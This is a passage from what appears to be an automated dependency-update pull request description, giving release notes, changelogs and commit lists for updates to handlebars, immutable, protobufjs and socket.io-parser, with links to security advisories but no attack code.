href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-442j-39wm-28r2\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-442j-39wm-28r2\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.8...v4.7.9\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.7.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMake library compatible with workers (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1894\"\u003e#1894\u003c/a\u003e) - 3d3796c\u003c/li\u003e\n\u003cli\u003eDon't rely on Node.js global object (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1776\"\u003e#1776\u003c/a\u003e) - 2954e7e\u003c/li\u003e\n\u003cli\u003eFix compiling of each block params in strict mode (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1855\"\u003e#1855\u003c/a\u003e) - 30dbf04\u003c/li\u003e\n\u003cli\u003eFix rollup warning when importing Handlebars as ESM - 03d387b\u003c/li\u003e\n\u003cli\u003eFix bundler issue with webpack 5 (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1862\"\u003e#1862\u003c/a\u003e) - c6c6bbb\u003c/li\u003e\n\u003cli\u003eUse https instead of git for mustache submodule - 88ac068\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.7...v4.7.8\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/handlebars-lang/handlebars.js/blob/v4.7.9/release-notes.md\"\u003ehandlebars's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.7.9 - March 26th, 2026\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: enable shell mode for spawn to resolve Windows EINVAL issue - e0137c2\u003c/li\u003e\n\u003cli\u003efix type \u0026quot;RuntimeOptions\u0026quot; also accepting string partials - eab1d14\u003c/li\u003e\n\u003cli\u003efeat(types): set \u003ccode\u003ehash\u003c/code\u003e to be a \u003ccode\u003eRecord\u0026lt;string, any\u0026gt;\u003c/code\u003e - de4414d\u003c/li\u003e\n\u003cli\u003efix non-contiguous program indices - 4512766\u003c/li\u003e\n\u003cli\u003erefactor: rename i to startPartIndex - e497a35\u003c/li\u003e\n\u003cli\u003esecurity: fix security issues - 68d8df5\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.8...v4.7.9\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.7.8 - July 27th, 2023\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMake library compatible with workers (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1894\"\u003e#1894\u003c/a\u003e) - 3d3796c\u003c/li\u003e\n\u003cli\u003eDon't rely on Node.js global object (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1776\"\u003e#1776\u003c/a\u003e) - 2954e7e\u003c/li\u003e\n\u003cli\u003eFix compiling of each block params in strict mode (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1855\"\u003e#1855\u003c/a\u003e) - 30dbf04\u003c/li\u003e\n\u003cli\u003eFix rollup warning when importing Handlebars as ESM - 03d387b\u003c/li\u003e\n\u003cli\u003eFix bundler issue with webpack 5 (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1862\"\u003e#1862\u003c/a\u003e) - c6c6bbb\u003c/li\u003e\n\u003cli\u003eUse https instead of git for mustache submodule - 88ac068\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.7...v4.7.8\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/dce542c9a660048d31f0981ac8a45c08b919bddb\"\u003e\u003ccode\u003edce542c\u003c/code\u003e\u003c/a\u003e v4.7.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/8a41389ba5b2624b6f43a5463d8e2533b843a562\"\u003e\u003ccode\u003e8a41389\u003c/code\u003e\u003c/a\u003e Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2\"\u003e\u003ccode\u003e68d8df5\u003c/code\u003e\u003c/a\u003e Fix security issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/b2a083136b11e1da9f0f47a11f749a9830a49328\"\u003e\u003ccode\u003eb2a0831\u003c/code\u003e\u003c/a\u003e Fix browser tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/9f98c1629834abf8de5a127caff8a2eab03d2c12\"\u003e\u003ccode\u003e9f98c16\u003c/code\u003e\u003c/a\u003e Fix release script\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/45443b4290475dfb7cec32a85d344f12ab345eb9\"\u003e\u003ccode\u003e45443b4\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Improve partial indenting performance\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/8841a5f6d35096aee95d68e1e49636a4cb5c661e\"\u003e\u003ccode\u003e8841a5f\u003c/code\u003e\u003c/a\u003e Fix CI errors with linting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/e0137c26f2202593bca7cc25184e733e87d54709\"\u003e\u003ccode\u003ee0137c2\u003c/code\u003e\u003c/a\u003e fix: enable shell mode for spawn to resolve Windows EINVAL issue\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/e914d6037ffb0dd371f7e4823cdb019732ae66d7\"\u003e\u003ccode\u003ee914d60\u003c/code\u003e\u003c/a\u003e Improve rendering performance\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/7de4b41c344a5d702edca93d1841b59642fa32bd\"\u003e\u003ccode\u003e7de4b41\u003c/code\u003e\u003c/a\u003e Upgrade GitHub Actions checkout and setup-node on 4.x branch\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.7...v4.7.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jaylinski\"\u003ejaylinski\u003c/a\u003e, a new releaser for handlebars since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `immutable` from 4.0.0 to 4.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/immutable-js/immutable-js/releases\"\u003eimmutable's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.1.0\u003c/h2\u003e\n\u003cp\u003eDocs: \u003ca href=\"https://immutable-js.com/docs/v4.1.0/\"\u003ehttps://immutable-js.com/docs/v4.1.0/\u003c/a\u003e\nChangelog Doc: \u003ca href=\"https://github.com/immutable-js/immutable-js/blob/fb4701a71ca3b138cb31b6697f047e637780867e/CHANGELOG.md#410---2022-05-23\"\u003ehttps://github.com/immutable-js/immutable-js/blob/fb4701a71ca3b138cb31b6697f047e637780867e/CHANGELOG.md#410---2022-05-23\u003c/a\u003e\nFull Changelog: \u003ca href=\"https://github.com/immutable-js/immutable-js/compare/v4.0.0...v4.1.0\"\u003ehttps://github.com/immutable-js/immutable-js/compare/v4.0.0...v4.1.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/immutable-js/immutable-js/blob/main/CHANGELOG.md\"\u003eimmutable's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.0] - 2022-05-23\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAccept Symbol as Map key. \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1859\"\u003e#1859\u003c/a\u003e by \u003ca href=\"https://github.com/jdeniau\"\u003ejdeniau\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOptimize contructors without arguments \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1887\"\u003e#1887\u003c/a\u003e by \u003ca href=\"https://github.com/marianoguerra\"\u003emarianoguerra\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix Flow removeIn types \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1902\"\u003e#1902\u003c/a\u003e by \u003ca href=\"https://github.com/nifgraup\"\u003enifgraup\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix bug in Record.equals when comparing against Map \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1903\"\u003e#1903\u003c/a\u003e by \u003ca href=\"https://github.com/jmtoung\"\u003ejmtoung\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/f3cb38e545326125b9b1c225ece8b113d3c057d9\"\u003e\u003ccode\u003ef3cb38e\u003c/code\u003e\u003c/a\u003e Release 4.1.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/f83e384fbc7647b3e8b4b73a47088b3bf5af835b\"\u003e\u003ccode\u003ef83e384\u003c/code\u003e\u003c/a\u003e Update Changlog based on recent improvements\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/800364678ff9052ce1bb8daeefa15dd515dda602\"\u003e\u003ccode\u003e8003646\u003c/code\u003e\u003c/a\u003e Fix bug in Record.equals when comparing against Map (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/1903\"\u003e#1903\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/13b9e4db84c549ac7ecb2f58000808c90317c81f\"\u003e\u003ccode\u003e13b9e4d\u003c/code\u003e\u003c/a\u003e Fix Flow removeIn types (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/1902\"\u003e#1902\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/f2dec5aa72c8ce0d893fa1b0eebe67f254ee2034\"\u003e\u003ccode\u003ef2dec5a\u003c/code\u003e\u003c/a\u003e refactor: replace deprecated String.prototype.substr() (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/1898\"\u003e#1898\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/10085fb2c9adda34d1d655dbddf55349e69c505a\"\u003e\u003ccode\u003e10085fb\u003c/code\u003e\u003c/a\u003e avoid \u0026quot;undefined\u0026quot; as classname\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/15dbc60fde69e4a97f1d6f1efa08295738103ba9\"\u003e\u003ccode\u003e15dbc60\u003c/code\u003e\u003c/a\u003e prefer word-break to make the fix compatible with doc pages too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/de19537d166aaf9366feee6b2afbe7f672d4ecfb\"\u003e\u003ccode\u003ede19537\u003c/code\u003e\u003c/a\u003e Fixed the docs page\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/4407ad3261502efa48f58c2ae884c8f9c1ef280a\"\u003e\u003ccode\u003e4407ad3\u003c/code\u003e\u003c/a\u003e Fixed the text overflow issue in small devices\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/4d0e9819e509861d0f16a64a4fc0bfdc892563f9\"\u003e\u003ccode\u003e4d0e981\u003c/code\u003e\u003c/a\u003e Accept Symbol as Map key. (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/1859\"\u003e#1859\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/immutable-js/immutable-js/compare/v4.0.0...v4.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `protobufjs` from 7.5.4 to 7.6.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/protobufjs/protobuf.js/releases\"\u003eprotobufjs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eprotobufjs: v7.6.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.6.0...protobufjs-v7.6.1\"\u003e7.6.1\u003c/a\u003e (2026-05-22)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport misc utility hardening (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2280\"\u003e#2280\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/8a45c13d22ec2d05ab1b7935fcb5331ea59a9cd0\"\u003e8a45c13\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eTreat fixed64 as unsigned in converters (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2266\"\u003e#2266\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/479dfdcc690feb9f71986049d3d38c7a0f979abb\"\u003e479dfdc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eprotobufjs: v7.6.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.9...protobufjs-v7.6.0\"\u003e7.6.0\u003c/a\u003e (2026-05-18)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport BigInt conversions (7.x) (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2258\"\u003e#2258\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/f76924244504b159efe1bb13b154fd17be3c13e7\"\u003ef769242\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eprotobufjs: v7.5.9\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.8...protobufjs-v7.5.9\"\u003e7.5.9\u003c/a\u003e (2026-05-17)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport bundler-safe optional module lookups (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2254\"\u003e#2254\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/0853a625680f9247596b84ef48082b8f4e554797\"\u003e0853a62\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eprotobufjs: v7.5.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.7...protobufjs-v7.5.8\"\u003e7.5.8\u003c/a\u003e (2026-05-12)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport parser hardening to 7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2245\"\u003e#2245\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/54b593ffd960f7fe4b0c448a12542c3de0a0cf26\"\u003e54b593f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eprotobufjs: v7.5.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.6...protobufjs-v7.5.7\"\u003e7.5.7\u003c/a\u003e (2026-05-09)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRestore first-match namespace lookup (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2236\"\u003e#2236\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/cc7d59559d4e8c533a35218310c67f4a5dda54f5\"\u003ecc7d595\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eprotobufjs: v7.5.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.5...protobufjs-v7.5.6\"\u003e7.5.6\u003c/a\u003e (2026-04-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport input hardening and CLI fixes to 7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2173\"\u003e#2173\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/75392ea1b78bdc4faba027b5db44ad7c50e9c454\"\u003e75392ea\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.5.5\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/protobufjs/protobuf.js/blob/protobufjs-v7.6.1/CHANGELOG.md\"\u003eprotobufjs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.6.0...protobufjs-v7.6.1\"\u003e7.6.1\u003c/a\u003e (2026-05-22)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport misc utility hardening (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2280\"\u003e#2280\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/8a45c13d22ec2d05ab1b7935fcb5331ea59a9cd0\"\u003e8a45c13\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eTreat fixed64 as unsigned in converters (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2266\"\u003e#2266\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/479dfdcc690feb9f71986049d3d38c7a0f979abb\"\u003e479dfdc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.9...protobufjs-v7.6.0\"\u003e7.6.0\u003c/a\u003e (2026-05-18)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport BigInt conversions (7.x) (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2258\"\u003e#2258\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/f76924244504b159efe1bb13b154fd17be3c13e7\"\u003ef769242\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.8...protobufjs-v7.5.9\"\u003e7.5.9\u003c/a\u003e (2026-05-17)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport bundler-safe optional module lookups (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2254\"\u003e#2254\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/0853a625680f9247596b84ef48082b8f4e554797\"\u003e0853a62\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.7...protobufjs-v7.5.8\"\u003e7.5.8\u003c/a\u003e (2026-05-12)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport parser hardening to 7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2245\"\u003e#2245\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/54b593ffd960f7fe4b0c448a12542c3de0a0cf26\"\u003e54b593f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.6...protobufjs-v7.5.7\"\u003e7.5.7\u003c/a\u003e (2026-05-09)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRestore first-match namespace lookup (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2236\"\u003e#2236\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/cc7d59559d4e8c533a35218310c67f4a5dda54f5\"\u003ecc7d595\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.5...protobufjs-v7.5.6\"\u003e7.5.6\u003c/a\u003e (2026-04-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport input hardening and CLI fixes to 7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2173\"\u003e#2173\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/75392ea1b78bdc4faba027b5db44ad7c50e9c454\"\u003e75392ea\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/f0b50d2fa1247d6652618190c2d6602e6830b90d\"\u003e\u003ccode\u003ef0b50d2\u003c/code\u003e\u003c/a\u003e chore: release protobufjs-v7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2268\"\u003e#2268\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/8a45c13d22ec2d05ab1b7935fcb5331ea59a9cd0\"\u003e\u003ccode\u003e8a45c13\u003c/code\u003e\u003c/a\u003e fix: Backport misc utility hardening (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2280\"\u003e#2280\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/479dfdcc690feb9f71986049d3d38c7a0f979abb\"\u003e\u003ccode\u003e479dfdc\u003c/code\u003e\u003c/a\u003e fix: Treat fixed64 as unsigned in converters (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2266\"\u003e#2266\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/e30c3341382b504a975d0d83f19170218cb461c3\"\u003e\u003ccode\u003ee30c334\u003c/code\u003e\u003c/a\u003e chore: release protobufjs-v7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2260\"\u003e#2260\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/f76924244504b159efe1bb13b154fd17be3c13e7\"\u003e\u003ccode\u003ef769242\u003c/code\u003e\u003c/a\u003e feat: Support BigInt conversions (7.x) (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2258\"\u003e#2258\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/ab3862d133ab9b824f12eab5f993784333543dbf\"\u003e\u003ccode\u003eab3862d\u003c/code\u003e\u003c/a\u003e chore: release protobufjs-v7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2255\"\u003e#2255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/0853a625680f9247596b84ef48082b8f4e554797\"\u003e\u003ccode\u003e0853a62\u003c/code\u003e\u003c/a\u003e fix: Backport bundler-safe optional module lookups (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2254\"\u003e#2254\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/d7035f9b7f06210ea343cab1f2f1cc18ee5cc1d6\"\u003e\u003ccode\u003ed7035f9\u003c/code\u003e\u003c/a\u003e chore: release protobufjs-v7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2248\"\u003e#2248\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/54b593ffd960f7fe4b0c448a12542c3de0a0cf26\"\u003e\u003ccode\u003e54b593f\u003c/code\u003e\u003c/a\u003e fix: Backport parser hardening to 7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2245\"\u003e#2245\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/e88fcea1635f79c414e8a070e164d38ea99e104a\"\u003e\u003ccode\u003ee88fcea\u003c/code\u003e\u003c/a\u003e chore: release protobufjs-v7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2239\"\u003e#2239\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.4...protobufjs-v7.6.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for protobufjs since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `socket.io-parser` from 4.2.4 to 4.2.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/socketio/socket.io/releases\"\u003esocket.io-parser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esocket.io-parser@4.2.6\u003c/h2\u003e\n\u003cp\u003eThis release includes a fix for \u003ca href=\"https://github.com/socketio/socket.io/security/advisories/GHSA-677m-j7p3-52f9\"\u003eCVE-2026-33151\u003c/a\u003e. Please upgrade as soon as possible.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd a limit to the number of binary attachments (\u003ca href=\"https://github.com/socketio/socket.io/commit/b25738c416c4e32fbff62ee182afa8f6d0dacf78\"\u003eb25738c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esocket.io-parser@4.2.5\u003c/h2\u003e\n\u003cp\u003eThis release contains a bump of \u003ccode\u003edebug\u003c/code\u003e from \u003ccode\u003e~4.3.1\u003c/code\u003e to 